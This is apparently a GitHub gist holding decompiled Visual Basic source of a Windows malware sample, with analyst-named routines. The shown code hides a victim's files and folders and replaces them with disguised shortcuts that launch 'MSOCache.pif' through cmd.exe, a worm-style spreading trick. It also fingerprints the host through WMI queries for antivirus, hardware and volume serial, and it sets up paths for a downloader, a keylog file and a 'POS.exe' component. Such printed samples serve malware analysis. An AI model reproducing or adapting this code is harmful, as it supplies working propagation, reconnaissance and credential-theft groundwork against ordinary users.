loc_4089EB: var_9C.Attributes = 6
loc_408A04: If CBool(var_9C.Name <> "MSOCache.pif") Then
loc_408A38: var_118 = var_98.Path & "\" & CVar(var_90(0)) & "." & "lnk"
loc_408A42: LateMemCallLdVar
loc_408A4A: CAdVar
loc_408A61: var_108 = "HKLM\software\classes\"
loc_408A8C: LateMemCallLdVar
loc_408A9D: var_F8 = CVar("HKLM\software\classes\" & "." & var_90(UBound(var_90, 1)) & "\") & MemVar_402104 & "\defaulticon\"
loc_408AA7: LateMemCallLdVar
loc_408AB0: var_88 = CStr(MemVar_402104)
loc_408ACC: Set var_180 = MemVar_402104
loc_408ADB: var_180.windowstyle = 7
loc_408AEA: var_180.targetpath = "cmd.exe"
loc_408AFC: var_180.workingdirectory = CVar(0)
loc_408B89: var_1A8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & Replace(CStr(var_9C.Name), " ", """" & " " & """", 1, -1, 0)
loc_408B97: var_180.arguments = CVar(var_1A8 & "&exit")
loc_408BD3: If CBool(InStr(1, var_88, ",", 0)) Then
loc_408BE2: var_180.iconlocation = CVar(var_88)
loc_408BE9: Else
loc_408BF7: var_180.iconlocation = var_9C.Path
loc_408BFE: End If
loc_408C03: Call var_180.save
loc_408C0D: Set var_180 = Nothing
loc_408C11: End If
loc_408C13: End If
loc_408C15: End If
loc_408C1C: Next
loc_408C31: var_C0 = var_98.Path & "\"
loc_408C3B: LateMemCallLdVar
loc_408C49: CAdVar
loc_408C5D: For Each var_A0 In MemVar_402104.subfolders
loc_408C6E: var_A0.Attributes = 6
loc_408C9F: var_128 = var_98.Path & "\" & var_A0.Name & "." & "lnk"
loc_408CA9: LateMemCallLdVar
loc_408CB1: CAdVar
loc_408CD8: var_B0 = CVar("HKLM\software\classes\" & "folder" & "\defaulticon\") 'String
loc_408CE1: LateMemCallLdVar
loc_408CEA: var_8C = CStr(MemVar_402104)
loc_408CFC: Set var_1B4 = MemVar_402104
loc_408D0B: var_1B4.windowstyle = 7
loc_408D1A: var_1B4.targetpath = "cmd.exe"
loc_408D2C: var_1B4.workingdirectory = CVar(0)
loc_408DC0: var_1B8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & "explorer " & Replace(CStr(var_A0.Name), " ", """" & " " & """", 1, -1, 0)
loc_408DCE: var_1B4.arguments = CVar(var_1B8 & "&exit")
loc_408E0C: If CBool(InStr(1, var_8C, ",", 0)) Then
loc_408E1B: var_1B4.iconlocation = CVar(var_8C)
loc_408E22: Else
loc_408E30: var_1B4.iconlocation = var_A0.Path
loc_408E37: End If
loc_408E3C: Call var_1B4.save
loc_408E46: Set var_1B4 = Nothing
loc_408E4F: Next
loc_408E55: End If
loc_408E5C: Next
loc_408E64: Exit Sub
End Sub
Public Sub fetch_av_products
'Data Table: 401634
Dim var_A8 As Variant
Dim var_F8 As Variant
Dim var_D8 As Long
loc_404F94: On Error Resume Next
loc_404F9C: var_8C = "SecurityCenter"
loc_404FAF: var_A8 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "CurrentVersion") 'String
loc_404FB8: LateMemCallLdVar
loc_404FD2: If (MemVar_402104 > 6) Then
loc_404FE2: var_8C = var_8C & CStr(2)
loc_404FE8: End If
loc_404FF1: var_F8 = CVar("select * from " & "AntivirusProduct") 'String
loc_405014: VarLateMemCallLdVar
loc_40501C: CAdVar
loc_40503A: For Each var_94 In GetObject(CVar("winmgmts:" & "\\.\root\" & var_8C), var_D8)
loc_405059: If (Len(var_94.DisplayName) > 0) Then
loc_405067: var_88 = CStr(var_94.DisplayName)
loc_40506D: End If
loc_40506F: Exit For
loc_40507A: Next
loc_405082: Exit Sub
End Sub
Public Sub is_battery_present
'Data Table: 401634
Dim var_F0 As Variant
loc_404440: On Error Resume Next
loc_404453: var_F0 = CVar("select * from " & "win32_" & "Battery") 'String
loc_404470: VarLateMemCallLdVar
loc_404478: CAdVar
loc_4044A3: If (GetObject("winmgmts:", var_D0).Count > 0) Then
loc_4044AB: var_88 = "1"
loc_4044B1: Else
loc_4044B6: var_88 = "0"
loc_4044B9: End If
loc_4044BB: Exit Sub
End Sub
Public Sub fetch_processor
'Data Table: 401634
Dim var_F4 As Variant
Dim var_D4 As Long
loc_404AF8: On Error Resume Next
loc_404B0B: var_F4 = CVar("win32_" & "Process" & "or") 'String
loc_404B28: VarLateMemCallLdVar
loc_404B30: CAdVar
loc_404B32: Set var_8C = GetObject("winmgmts:", var_D4)
loc_404B5B: If (var_8C.Count > 0) Then
loc_404B66: For Each var_90 In var_8C
loc_404B85: If (Len(var_90.Name) > 0) Then
loc_404B93: var_88 = CStr(var_90.Name)
loc_404B99: End If
loc_404B9B: Exit For
loc_404BA6: Next
loc_404BAC: End If
loc_404BB0: Exit Sub
End Sub
Public Sub fetch_video_controller
'Data Table: 401634
Dim var_F0 As Variant
Dim var_D0 As Long
loc_4048E0: On Error Resume Next
loc_4048EC: var_F0 = CVar("win32_" & "VideoController") 'String
loc_404909: VarLateMemCallLdVar
loc_404911: CAdVar
loc_404913: Set var_8C = GetObject("winmgmts:", var_D0)
loc_404939: If (var_8C.Count > 0) Then
loc_404944: For Each var_90 In var_8C
loc_404963: If (Len(var_90.VideoProcessor) > 0) Then
loc_404971: var_88 = CStr(var_90.Caption)
loc_404977: End If
loc_404979: Exit For
loc_404984: Next
loc_40498A: End If
loc_40498E: Exit Sub
End Sub
Public Sub fetch_logical_disks
'Data Table: 401634
Dim var_F0 As Variant
Dim var_A0 As Variant
Dim var_D0 As Long
loc_40523C: On Error Resume Next
loc_40524F: var_F0 = CVar("select * from " & "win32_" & "LogicalDisk") 'String
loc_40526C: VarLateMemCallLdVar
loc_405274: CAdVar
loc_405292: For Each obj In GetObject("winmgmts:", var_D0)
loc_4052A6: var_A0 = 0
loc_4052B1: If (Len(obj.VolumeSerialNumber) > var_A0) Then
loc_4052BF: VOL_SERIAL = CStr(obj.VolumeSerialNumber)
loc_4052CA: Exit For
loc_4052D3: Else
loc_4052F6: If (Len(GetSetting("L!NK", "1", "0", var_A0)) <> 8) Then
loc_40530C: SaveSetting("L!NK", "1", "0", make_random_string(var_F0))
loc_405314: End If
loc_405328: VOL_SERIAL = GetSetting("L!NK", "1", "0", var_A0)
loc_405330: Exit For
loc_405336: End If
loc_40533D: Next
loc_405345: Exit Sub
End Sub
Public Sub fetch_system
'Data Table: 401634
Dim var_F4 As Variant
Dim var_D4 As Variant
loc_404D30: On Error Resume Next
loc_404D43: var_F4 = CVar("select * from " & "win32_" & "ComputerSystem") 'String
loc_404D60: VarLateMemCallLdVar
loc_404D68: CAdVar
loc_404D86: For Each obj In GetObject("winmgmts:", var_D4)
loc_404DA5: If (Len(obj.TotalPhysicalMemory) > 0) Then
loc_404DDE: var_88 = FormatNumber((obj.TotalPhysicalMemory / &H40000000), -1, -2, -2, -2)
loc_404DEA: Exit For
loc_404DF0: End If
loc_404DF7: Next
loc_404DFF: Exit Sub
End Sub
Public Sub Proc_0_49_404F40(index) '404F40
'Data Table: 401634
loc_404E5C: On Error Resume Next
loc_404E81: ReDim _arr(0 To 8)
loc_404E98: _arr(0) = 97 'a
loc_404EA6: _arr(1) = 98 'b
loc_404EB4: _arr(2) = 99 'c
loc_404EC2: _arr(3) = 100 'd
loc_404ED0: _arr(4) = 101 'e
loc_404EDE: _arr(5) = 105 'i
loc_404EEC: _arr(6) = 102 'f
loc_404EFA: _arr(7) = 103 'g
loc_404F08: _arr(8) = 104 'h
loc_404F2C: var_88 = VOL_SERIAL & "." & ChrW$(CLng(Array(_arr)(index)))
loc_404F3F: Exit Sub
End Sub
Public Sub make_random_string
'Data Table: 401634
loc_4042D8: On Error Resume Next
loc_4042E0: Randomize(var_AC)
loc_4042F7: For var_B4 = 1 To 8: var_8C = var_B4 'Long
loc_40432C: var_88 = var_88 & Mid$("ABCDEF0123456789", CLng(Int(((Rnd(var_AC) * CDbl(&H10)) + CDbl(1)))), 1)
loc_40433E: Next var_B4 'Long
loc_404345: Exit Sub
End Sub
Public Sub fingerprint_system(arg_C) '407E60
'Data Table: 401634
Dim var_B4 As Variant
Dim var_174 As String
Dim var_1B0 As String
loc_407B30: On Error Resume Next
loc_407B7D: var_88 = LCase$(Left$(Me(124), 1) & Right$(Me(124), 1) & Mid$(Me(124), &H10, 1))
loc_407B9C: If (Len(arg_C) <> 0) Then
loc_407BBD: var_8C = String$(&HE, "|") & arg_C
loc_407BC9: Else
loc_407BDC: var_C4 = Environ$(CVar("COMPUTER" & "Name"))
loc_407BF3: var_C8 = Environ$(CVar("USER" & "Name"))
loc_407C0A: var_DC = Environ$(CVar("USER" & "DOMAIN"))
loc_407C27: var_B4 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "Product" & "Name") 'String
loc_407C30: LateMemCallLdVar
loc_407C39: var_CC = CStr(MemVar_402104)
loc_407C79: LateMemCallLdVar
loc_407C9F: var_D0 = FormatNumber((MemVar_402104.TotalSize / &H40000000), CVar(Environ$("HOMEDRIVE")), -1, -2, -2)
loc_407CC4: var_B4 = CVar("Process" & "OR_ARCHITEW" & CStr(6432)) 'String
loc_407CE2: If (Len(Environ$(var_B4)) = 0) Then
loc_407CEA: var_D4 = "1"
loc_407CF0: Else
loc_407CF5: var_D4 = "0"
loc_407CF8: End If
loc_407CFF: If CopyMemory(-2, var_B4, ) Then
loc_407D07: var_D8 = "1"
loc_407D0D: Else
loc_407D12: var_D8 = "0"
loc_407D15: End If
loc_407D7E: var_174 = fetch_system(fetch_av_products(var_C4 & "|") & "|" & var_CC & "|" & VOL_SERIAL & "|" & "L!NK" & "|" & var_C8 & "|") & "|"
loc_407DE1: var_1B0 = is_battery_present(fetch_video_controller(fetch_processor(var_174) & "|") & "|" & var_D0 & "|" & var_D4 & "|" & var_D8 & "|") & "|"
loc_407DEF: var_8C = var_1B0 & var_DC & "|"
loc_407E33: End If
loc_407E4D: Me(12) = var_88 & "=" & Proc_0_18_405D30(var_8C)
loc_407E5C: Exit Sub
End Sub
Public Sub get_object_type(type) '404408
'Data Table: 401634
Dim _type As Long
loc_40438B: _type = type
loc_404397: If (_type = 0) Then
loc_4043A1: var_88 = "WScript." & "Shell"
loc_4043A7: Else
loc_4043B0: If (_type = 1) Then
loc_4043B6: var_88 = "Scripting.FileSystemObject"
loc_4043BC: Else
loc_4043C5: If (_type = 2) Then
loc_4043CF: var_88 = "MSXML2." & "ServerXMLHTTP"
loc_4043D5: Else
loc_4043DE: If (_type = 3) Then
loc_4043E8: var_88 = "Shell" & ".Application"
loc_4043EE: Else
loc_4043F7: If (_type = 4) Then
loc_404401: var_88 = "MSXML2." & "DOMDocument"
loc_404404: End If
loc_404404: End If
loc_404404: End If
loc_404404: End If
loc_404404: End If
loc_404404: Exit Sub
End Sub
Public Sub init_globals
'Data Table: 401634
Dim var_B0 As Variant
loc_406B60: CAdVar
loc_406B62: WSCRIPT_OBJ = CreateObject(get_object_type(0), 0)
loc_406B8E: CAdVar
loc_406B90: SCRIPTINGFSO_OBJ = CreateObject(get_object_type(1), 0)
loc_406BBC: CAdVar
loc_406BBE: MSXML_OBJ = CreateObject(get_object_type(2), 0)
loc_406BE1: TEMP_DIR = Environ$("TEMP") & "\"
loc_406C04: APPDATA_DIR = Environ$("APPDATA") & "\"
loc_406C27: WINDIR = Environ$("WINDIR") & "\"
loc_406C3F: var_B4 = Me.Global.App
loc_406C53: MY_DIR = App.Path & "\"
loc_406C5F: var_B0 = "Startup"
loc_406C6A: LateMemCallLdVar
loc_406C7C: Me(40) = CStr(MemVar_402104 & "\")
loc_406C99: SYSTEM32_DIR = WINDIR & "system32" & "\"
loc_406CAB: HOSTS_PATH = SYSTEM32_DIR & "drivers\etc\hosts"
loc_406CC7: var_88 = Environ$(Me(136)) & "\"
loc_406CDB: If Not(Proc_0_14_403F14(var_88, 0)) Then
loc_406CE3: Me(52) = TEMP_DIR
loc_406CEB: Else
loc_406CEE: Me(52) = var_88
loc_406CF3: End If
loc_406D15: MY_APPNAME = Me(52) & Me(144) & "\" & MY_APPNAME & ".exe"
loc_406D34: LOGNAME = MY_DIR & "log" & ".c"
loc_406D46: DWN_EXE = MY_DIR & "dwn.exe"
loc_406D53: POS_EXE = "POS" & ".exe"
loc_406D69: KEYS_C = MY_DIR & "keys" & ".c"
loc_406D7D: POS_PATH = APPDATA_DIR & POS_EXE
loc_406D8C: OUTPUT_TXT = APPDATA_DIR & "output.txt"
loc_406DA2: OFF_C = MY_DIR & "Off" & ".c"
loc_406DBB: WIN_C = MY_DIR & "win" & ".c"
loc_406DC4: Exit Sub
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment